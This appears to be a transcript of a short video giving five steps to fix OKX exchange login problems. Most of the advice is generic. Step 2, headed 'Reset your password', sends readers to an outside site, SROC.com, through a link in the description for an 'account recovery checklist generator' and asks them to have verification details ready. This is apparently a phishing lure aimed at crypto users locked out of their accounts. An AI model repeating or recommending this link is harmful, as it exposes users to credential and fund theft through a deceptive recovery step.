I hit this issue today and here's the quick fix that solved it. If you're having trouble logging into OKX, follow these steps to get back on track. Step 1. Check your credentials. Make sure you are entering the correct email and password. Double check for any typos or case sensitivity. Step 2. Reset your password. Before starting recovery, use the SROC.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Clear browser cache. Sometimes stored data can cause login issues. Clear your browser's cache and cookies, then try logging in again. A quick tip: in Chrome, you can do this by going to Settings, Privacy and Security, clear browsing data. Step 4. Disable VPN or proxying. If you're using a VPN or proxy, try disabling it. These can sometimes interfere with the login process. Step 5. Contact support. If none of the above steps work, reach out to OKX support for assistance. Provide them with details about your issue. I hope this guide helps you resolve your login issues quickly. If you have any other questions, feel free to ask.